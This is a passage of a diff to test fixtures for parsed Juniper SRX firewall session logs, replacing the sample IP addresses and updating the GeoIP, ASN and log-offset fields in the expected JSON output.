+        "client.ip": "67.43.156.12",
         "client.nat.port": 14406,
         "client.packets": 1,
         "client.port": 3129,
-        "destination.as.number": 701,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "207.17.137.56",
         "destination.nat.ip": "207.17.137.56",
         "destination.nat.port": 21,
@@ -1008,7 +951,7 @@
         "event.end": "2013-01-19T15:18:17.040-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"",
+        "event.original": "source-address=\"67.43.156.12\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2013-01-19T15:18:17.040-02:00",
@@ -1026,7 +969,7 @@
         "juniper.srx.src_nat_rule_name": "1",
         "juniper.srx.tag": "APPTRACK_SESSION_VOL_UPDATE",
         "log.level": "informational",
-        "log.offset": 9631,
+        "log.offset": 9699,
         "network.bytes": 48,
         "network.iana_number": "6",
         "network.packets": 1,
@@ -1038,8 +981,8 @@
         "observer.vendor": "Juniper",
         "related.ip": [
             "173.167.224.7",
-            "192.168.224.30",
-            "207.17.137.56"
+            "207.17.137.56",
+            "67.43.156.12"
         ],
         "rule.name": "General-Outbound",
         "server.bytes": 0,
@@ -1048,18 +991,14 @@
         "server.packets": 0,
         "server.port": 21,
         "service.type": "juniper",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
+        "source.as.number": 35908,
         "source.bytes": 48,
-        "source.geo.city_name": "Plymouth",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 42.3695,
-        "source.geo.location.lon": -83.4769,
-        "source.geo.region_iso_code": "US-MI",
-        "source.geo.region_name": "Michigan",
-        "source.ip": "192.168.224.30",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.nat.ip": "173.167.224.7",
         "source.nat.port": 14406,
         "source.packets": 1,
@@ -1072,18 +1011,11 @@
     {
         "@timestamp": "2013-01-19T15:18:17.040-02:00",
         "client.bytes": 144,
-        "client.ip": "192.168.224.30",
+        "client.ip": "67.43.156.12",
         "client.nat.port": 14406,
         "client.packets": 3,
         "client.port": 3129,
-        "destination.as.number": 701,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
         "destination.bytes": 104,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "207.17.137.56",
         "destination.nat.ip": "207.17.137.56",
         "destination.nat.port": 21,
@@ -1098,7 +1030,7 @@
         "event.end": "2013-01-19T15:18:18.040-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "reason=\"application failure or action\" source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"",
+        "event.original": "reason=\"application failure or action\" source-address=\"67.43.156.12\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2013-01-19T15:18:17.040-02:00",
@@ -1118,7 +1050,7 @@
         "juniper.srx.src_nat_rule_name": "1",
         "juniper.srx.tag": "APPTRACK_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 10364,
+        "log.offset": 10434,
         "network.bytes": 248,
         "network.iana_number": "6",
         "network.packets": 5,
@@ -1130,8 +1062,8 @@
         "observer.vendor": "Juniper",
         "related.ip": [
             "173.167.224.7",
-            "192.168.224.30",
-            "207.17.137.56"
+            "207.17.137.56",
+            "67.43.156.12"
         ],
         "rule.name": "General-Outbound",
         "server.bytes": 104,
@@ -1140,18 +1072,14 @@
         "server.packets": 2,
         "server.port": 21,
         "service.type": "juniper",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
+        "source.as.number": 35908,
         "source.bytes": 144,
-        "source.geo.city_name": "Plymouth",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 42.3695,
-        "source.geo.location.lon": -83.4769,
-        "source.geo.region_iso_code": "US-MI",
-        "source.geo.region_name": "Michigan",
-        "source.ip": "192.168.224.30",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.nat.ip": "173.167.224.7",
         "source.nat.port": 14406,
         "source.packets": 3,
@@ -1164,18 +1092,11 @@
     {
         "@timestamp": "2013-01-19T15:18:18.040-02:00",
         "client.bytes": 19592,
-        "client.ip": "4.0.0.1",
+        "client.ip": "67.43.156.12",
         "client.nat.port": 33040,
         "client.packets": 371,
         "client.port": 33040,
-        "destination.as.number": 29256,
-        "destination.as.organization.name": "Syrian Telecom",
         "destination.bytes": 686432,
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "SY",
-        "destination.geo.country_name": "Syria",
-        "destination.geo.location.lat": 35.0,
-        "destination.geo.location.lon": 38.0,
         "destination.ip": "5.0.0.1",
         "destination.nat.ip": "5.0.0.1",
         "destination.nat.port": 80,
@@ -1190,7 +1111,7 @@
         "event.end": "2013-01-19T15:19:18.040-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-address=\"4.0.0.1\" source-port=\"33040\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"4.0.0.1\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d",
+        "event.original": "source-address=\"67.43.156.12\" source-port=\"33040\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.12\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2013-01-19T15:18:18.040-02:00",
@@ -1212,7 +1133,7 @@
         "juniper.srx.session_id_32": "28",
         "juniper.srx.tag": "APPTRACK_SESSION_VOL_UPDATE",
         "log.level": "informational",
-        "log.offset": 11130,
+        "log.offset": 11202,
         "network.bytes": 706024,
         "network.iana_number": "6",
         "network.packets": 955,
@@ -1224,8 +1145,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "4.0.0.1",
-            "5.0.0.1"
+            "5.0.0.1",
+            "67.43.156.12"
         ],
         "related.user": [
             "user1"
@@ -1237,16 +1158,15 @@
         "server.packets": 584,
         "server.port": 80,
         "service.type": "juniper",
-        "source.as.number": 3356,
-        "source.as.organization.name": "Level 3 Parent, LLC",
+        "source.as.number": 35908,
         "source.bytes": 19592,
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "4.0.0.1",
-        "source.nat.ip": "4.0.0.1",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
+        "source.nat.ip": "67.43.156.12",
         "source.nat.port": 33040,
         "source.packets": 371,
         "source.port": 33040,
@@ -1258,16 +1178,9 @@
     },
     {
         "@timestamp": "2013-01-19T15:18:19.040-02:00",
-        "client.ip": "4.0.0.1",
+        "client.ip": "67.43.156.12",
         "client.nat.port": 33040,
         "client.port": 33040,
-        "destination.as.number": 29256,
-        "destination.as.organization.name": "Syrian Telecom",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "SY",
-        "destination.geo.country_name": "Syria",
-        "destination.geo.location.lat": 35.0,
-        "destination.geo.location.lon": 38.0,
         "destination.ip": "5.0.0.1",
         "destination.nat.ip": "5.0.0.1",
         "destination.nat.port": 80,
@@ -1279,7 +1192,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-address=\"4.0.0.1\" source-port=\"33040\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"4.0.0.1\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=\u201dpf1\u201d rule-name=\u201dfacebook1\u201d routing-instance=\u201dinstance1\u201d destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d",
+        "event.original": "source-address=\"67.43.156.12\" source-port=\"33040\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.12\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=\u201dpf1\u201d rule-name=\u201dfacebook1\u201d routing-instance=\u201dinstance1\u201d destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d",
         "event.outcome": "success",
         "event.severity": 14,
         "event.timezone": "-02:00",
@@ -1303,7 +1216,7 @@
         "juniper.srx.session_id_32": "28",
         "juniper.srx.tag": "APPTRACK_SESSION_ROUTE_UPDATE",
         "log.level": "informational",
-        "log.offset": 11929,
+        "log.offset": 12015,
         "network.iana_number": "6",
         "observer.egress.interface.name": "\u201dst0.0\u201d",
         "observer.egress.zone": "untrust",
@@ -1313,8 +1226,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "4.0.0.1",
-            "5.0.0.1"
+            "5.0.0.1",
+            "67.43.156.12"
         ],
         "related.user": [
             "user1"
@@ -1324,15 +1237,14 @@
         "server.nat.port": 80,
         "server.port": 80,
         "service.type": "juniper",
-        "source.as.number": 3356,
-        "source.as.organization.name": "Level 3 Parent, LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "4.0.0.1",
-        "source.nat.ip": "4.0.0.1",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
+        "source.nat.ip": "67.43.156.12",
         "source.nat.port": 33040,
         "source.port": 33040,
         "source.user.name": "user1",
@@ -1344,18 +1256,11 @@
     {
         "@timestamp": "2013-01-19T15:18:20.040-02:00",
         "client.bytes": 392,
-        "client.ip": "4.0.0.1",
+        "client.ip": "67.43.156.12",
         "client.nat.port": 48873,
         "client.packets": 5,
         "client.port": 48873,
-        "destination.as.number": 29256,
-        "destination.as.organization.name": "Syrian Telecom",
         "destination.bytes": 646,
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "SY",
-        "destination.geo.country_name": "Syria",
-        "destination.geo.location.lat": 35.0,
-        "destination.geo.location.lon": 38.0,
         "destination.ip": "5.0.0.1",
         "destination.nat.ip": "5.0.0.1",
         "destination.nat.port": 80,
@@ -1370,7 +1275,7 @@
         "event.end": "2013-01-19T15:18:23.040-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "reason=\"TCP CLIENT RST\" source-address=\"4.0.0.1\" source-port=\"48873\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"4.0.0.1\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d",
+        "event.original": "reason=\"TCP CLIENT RST\" source-address=\"67.43.156.12\" source-port=\"48873\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.12\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2013-01-19T15:18:20.040-02:00",
@@ -1391,7 +1296,7 @@
         "juniper.srx.session_id_32": "32",
         "juniper.srx.tag": "APPTRACK_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 12689,
+        "log.offset": 12789,
         "network.bytes": 1038,
         "network.iana_number": "6",
         "network.packets": 8,
@@ -1403,8 +1308,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "4.0.0.1",
-            "5.0.0.1"
+            "5.0.0.1",
+            "67.43.156.12"
         ],
         "related.user": [
             "user1"
@@ -1416,16 +1321,15 @@
         "server.packets": 3,
         "server.port": 80,
         "service.type": "juniper",
-        "source.as.number": 3356,
-        "source.as.organization.name": "Level 3 Parent, LLC",
+        "source.as.number": 35908,
         "source.bytes": 392,
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "4.0.0.1",
-        "source.nat.ip": "4.0.0.1",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
+        "source.nat.ip": "67.43.156.12",
         "source.nat.port": 48873,
         "source.packets": 5,
         "source.port": 48873,
@@ -1437,14 +1341,9 @@
     },
     {
         "@timestamp": "2020-11-04T14:23:09.264-02:00",
-        "client.ip": "50.0.0.100",
+        "client.ip": "175.16.199.1",
         "client.nat.port": 24065,
         "client.port": 24065,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "30.0.0.100",
         "destination.nat.ip": "30.0.0.100",
         "destination.nat.port": 768,
@@ -1456,7 +1355,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-address=\"50.0.0.100\" source-port=\"24065\" destination-address=\"30.0.0.100\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"50.0.0.100\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"",
+        "event.original": "source-address=\"175.16.199.1\" source-port=\"24065\" destination-address=\"30.0.0.100\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.timezone": "-02:00",
@@ -1472,7 +1371,7 @@
         "juniper.srx.session_id_32": "100000165",
         "juniper.srx.tag": "RT_FLOW_SESSION_CREATE_LS",
         "log.level": "informational",
-        "log.offset": 13489,
+        "log.offset": 13603,
         "network.iana_number": "1",
         "observer.egress.zone": "trust",
         "observer.ingress.interface.name": "reth2.0",
@@ -1482,21 +1381,24 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "30.0.0.100",
-            "50.0.0.100"
+            "175.16.199.1",
+            "30.0.0.100"
         ],
         "rule.name": "alg-policy",
         "server.ip": "30.0.0.100",
         "server.nat.port": 768,
         "server.port": 768,
         "service.type": "juniper",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "50.0.0.100",
-        "source.nat.ip": "50.0.0.100",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
+        "source.nat.ip": "175.16.199.1",
         "source.nat.port": 24065,
         "source.port": 24065,
         "tags": [
@@ -1536,7 +1438,7 @@
         "juniper.srx.session_id_32": "7087",
         "juniper.srx.tag": "RT_FLOW_SESSION_DENY_LS",
         "log.level": "informational",
-        "log.offset": 14137,
+        "log.offset": 14259,
         "network.iana_number": "17",
         "observer.egress.zone": "junos-host",
         "observer.ingress.interface.name": ".local..0",
@@ -1563,18 +1465,11 @@
     {
         "@timestamp": "2020-01-19T15:18:20.040-02:00",
         "client.bytes": 392,
-        "client.ip": "4.0.0.1",
+        "client.ip": "67.43.156.12",
         "client.nat.port": 48873,
         "client.packets": 5,
         "client.port": 48873,
-        "destination.as.number": 29256,
-        "destination.as.organization.name": "Syrian Telecom",
         "destination.bytes": 646,
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "SY",
-        "destination.geo.country_name": "Syria",
-        "destination.geo.location.lat": 35.0,
-        "destination.geo.location.lon": 38.0,
         "destination.ip": "5.0.0.1",
         "destination.nat.ip": "5.0.0.1",
         "destination.nat.port": 80,
@@ -1589,7 +1484,7 @@
         "event.end": "2020-01-19T15:18:23.040-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "reason=\"TCP CLIENT RST\" source-address=\"4.0.0.1\" source-port=\"48873\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"4.0.0.1\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d",
+        "event.original": "reason=\"TCP CLIENT RST\" source-address=\"67.43.156.12\" source-port=\"48873\" destination-address=\"5.0.0.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.12\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=\u201dst0.0\u201d apbr-rule-type=\u201ddefault\u201d",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2020-01-19T15:18:20.040-02:00",
@@ -1610,7 +1505,7 @@
         "juniper.srx.session_id_32": "32",
         "juniper.srx.tag": "APPTRACK_SESSION_CLOSE_LS",
         "log.level": "informational",
-        "log.offset": 14803,
+        "log.offset": 14929,
         "network.bytes": 1038,
         "network.iana_number": "6",
         "network.packets": 8,
@@ -1622,8 +1517,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "4.0.0.1",
-            "5.0.0.1"
+            "5.0.0.1",
+            "67.43.156.12"
         ],
         "related.user": [
             "user1"
@@ -1635,16 +1530,15 @@
         "server.packets": 3,
         "server.port": 80,
         "service.type": "juniper",
-        "source.as.number": 3356,
-        "source.as.organization.name": "Level 3 Parent, LLC",
+        "source.as.number": 35908,
         "source.bytes": 392,
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "4.0.0.1",
-        "source.nat.ip": "4.0.0.1",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
+        "source.nat.ip": "67.43.156.12",
         "source.nat.port": 48873,
         "source.packets": 5,
         "source.port": 48873,
@@ -1661,17 +1555,7 @@
         "client.nat.port": 6018,
         "client.packets": 42,
         "client.port": 58943,
-        "destination.as.number": 42652,
-        "destination.as.organization.name": "inexio Informationstechnologie und Telekommunikation Gmbh",
         "destination.bytes": 2132,
-        "destination.geo.city_name": "Philippsburg",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 49.2317,
-        "destination.geo.location.lon": 8.4607,
-        "destination.geo.region_iso_code": "DE-BW",
-        "destination.geo.region_name": "Baden-W\u00fcrttemberg",
         "destination.ip": "46.165.154.241",
         "destination.nat.ip": "46.165.154.241",
         "destination.nat.port": 80,
@@ -1705,7 +1589,7 @@
         "juniper.srx.src_nat_rule_name": "our-nat-rule",
         "juniper.srx.tag": "APPTRACK_SESSION_VOL_UPDATE",
         "log.level": "informational",
-        "log.offset": 15606,
+        "log.offset": 15746,
         "network.bytes": 4454,
         "network.iana_number": "6",
         "network.packets": 76,
@@ -1746,17 +1630,7 @@
         "client.nat.port": 24519,
         "client.packets": 161,
         "client.port": 64720,
-        "destination.as.number": 50881,
-        "destination.as.organization.name": "ESET, spol. s r.o.",
         "destination.bytes": 9670,
-        "destination.geo.city_name": "Bratislava",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "SK",
-        "destination.geo.country_name": "Slovakia",
-        "destination.geo.location.lat": 48.15,
-        "destination.geo.location.lon": 17.1078,
-        "destination.geo.region_iso_code": "SK-BL",
-        "destination.geo.region_name": "Bratislava",
         "destination.ip": "91.228.167.172",
         "destination.nat.ip": "91.228.167.172",
         "destination.nat.port": 8883,
@@ -1800,7 +1674,7 @@
         "juniper.srx.src_nat_rule_type": "source rule",
         "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 16469,
+        "log.offset": 16613,
         "network.bytes": 19200,
         "network.iana_number": "6",
         "network.packets": 257,
@@ -1839,15 +1713,16 @@
         "client.ip": "10.1.1.100",
         "client.nat.port": 30838,
         "client.port": 49583,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.port": 53,
         "event.action": "flow_started",
@@ -1857,7 +1732,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
